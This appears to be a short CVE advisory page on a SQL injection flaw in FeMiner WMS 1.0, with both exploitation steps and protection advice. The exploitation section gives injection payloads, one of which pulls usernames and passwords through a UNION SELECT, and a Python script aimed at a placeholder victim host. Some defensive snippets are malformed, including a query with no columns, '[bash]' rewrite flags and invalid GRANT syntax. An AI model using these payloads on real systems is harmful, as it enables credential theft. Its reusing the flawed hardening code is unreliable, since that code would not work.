FeMiner WMS 10, SQL Injection, CVE-2025-25994 (Critical)

By /

How CVE-2025-25994 Works

This vulnerability in FeMiner WMS 1.0 arises due to improper input sanitization in the date1, date2, and `id` parameters. An attacker can inject malicious SQL queries through these parameters, manipulating database operations. The application constructs SQL queries by directly concatenating user-supplied input without validation, enabling unauthorized access to sensitive data such as user credentials, transaction records, or administrative details. Exploitation occurs via crafted HTTP requests, where injected SQL commands bypass authentication and execute arbitrary database operations.

DailyCVE Form:

Platform: FeMiner WMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-02-14

What Undercode Say:

Exploitation:

1. Craft Malicious Payload:

' OR 1=1--

Injected into `date1` to bypass filters.

2. Exfiltrate Data:

' UNION SELECT username, password FROM users--

Retrieves credentials via `id` parameter.

3. Automated Exploit (Python):

import requests
target = "http://victim.com/wms/query"
payload = {"date1": "' UNION SELECT 1,@@version--", "id": "1"}
response = requests.post(target, data=payload)
print(response.text)

Protection:

1. Input Validation:

if (!preg_match("/^[0-9-]+$/", $_POST['date1'])) {
die("Invalid input");
}

2. Prepared Statements:

cursor.execute("SELECT FROM orders WHERE date BETWEEN %s AND %s", (date1, date2))

3. WAF Rules:

location /wms/ {
modsecurity_rules 'SecRule ARGS "@detectSQLi" "deny,log,status:403"';
}

4. Patch Verification:

curl -I http://victim.com/wms/ | grep "X-Patched: CVE-2025-25994"

5. Log Analysis:

grep "SQL syntax" /var/log/wms/access.log

6. Mitigation (Temporary):

RewriteCond %{QUERY_STRING} (union|select|--) [bash]
RewriteRule ^ - [bash]

7. Database Hardening:

REVOKE ALL PRIVILEGES ON wms_db FROM 'webuser'@'%';
GRANT SELECT ONLY ON wms_db.orders TO 'webuser'@'%';

8. Exploit Detection (Snort):

alert tcp any any -> $HOME_NET 80 (msg:"CVE-2025-25994 Exploit"; content:"date1='"; nocase;)

9. Vendor Patch:

Upgrade to FeMiner WMS 1.1 or apply vendor-supplied patches.

10. Post-Exploit Analysis:

strings /var/lib/mysql/wms_db/users.MYD | grep "@"

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top